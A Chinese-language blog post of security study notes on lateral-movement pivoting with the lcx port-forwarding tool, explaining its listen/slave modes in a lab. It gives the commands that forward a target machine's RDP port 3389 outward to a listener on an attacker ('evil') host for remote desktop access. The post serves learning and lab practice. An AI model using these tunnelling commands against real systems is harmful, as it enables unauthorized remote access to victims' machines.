跳板攻击之:lcx 端口转发
2024-09-08 18:52:56
跳板攻击之:lcx 端口转发
郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。
1 lcx 端口转发原理
lcx 是基于 Socket 套接字实现的端口转发工具,Windows 版本名称为 LCX、Linux 版本为 portmap。
一个基本的 Socket 隧道必须包含两端:
- 服务端:监听一个端口,等待客户端连接
- 客户端:通过传入服务端的 IP 地址和端口,与服务端建立连接。
lcx.exe -h
[Usage of Packet Transmit:]
lcx.exe -<listen|tran|slave> <option> [-log logfile]
[option:]
-listen <ConnectPort> <TransmitPort>
-tran <ConnectPort> <TransmitHost> <TransmitPort> # 经测试无法过 nat 有点鸡肋。
-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>
2 实验环境
3 配置服务端
- 在 evil 主机上,将本机 4444 端口上监听的所有数据转发到本地的 13389 端口上
lcx.exe -listen 4444 13389
4 配置客户端
- 首先准备好一个具有公网 ip 的服务器,假定域名或者公网 ip 是 192.168.0.21
- 在目标机器上将 3389 端口的所有数据转发到恶意主机的 4444 端口上。
配置 LCX 端口转发
.\lcx.exe -slave 192.168.0.110 4444 127.0.0.1 3389
客户端与服务端建立通信连接
与远程主机建立远程桌面连接
客户端:
服务端:
抓包查看流量特征
最新文章
- CentOS 安装tomcat 7
- Java程序员必须知道的10个调试技巧
- ubuntu15.10_x64 安装 nginx
- 让Chrome支持Ajax/$http方式读取本地文件
- 使用ASP.NET 5开发AngularJS应用
- Netsharp快速入门(之18) 平台常用功能(工作区相关)
- CornerStone 破解 最简单的破解方法
- python 调用hive查询实现类似存储过程
- Activity 和 Intent
- UVALive 6472 Powers of Pascal
- Java-DES算法加密解密工具类
- Linux shell 操作 postgresql,并设置crontab任务
- Python爬虫从入门到放弃(十)之 关于深度优先和广度优先
- css清除浮动主要方法
- Action调用Service
- 堆,set,优先队列
- Dockerfile的常见命令
- Populate screen data automatically
- [No0000198]swagger api一键导入postman
- MongoDB shell 介绍
热门文章
- Fastjson漏洞+复现
- linux系统部署微服务项目
- vue 强制刷新数据 this.$forceUpdate()
- 基于ZR.VUE 前端的改造,页面刷新报错
- 使用Jiralert实现AlertManager告警对接Jira
- Isaac Sim 机器人仿真器介绍、安装与 Docker [1]
- [Unity]Unity更改黑色主题(个人版)
- [cocos2d-x]判断两个矩形是否有交叉区域
- angular11报错Can&#39;t bind to &#39;ngForOf&#39; since it isn&#39;t a known property of &#39;tr&#39;. 三种排查办法以及解决方案
- Java 进阶P-4.4+P-4.5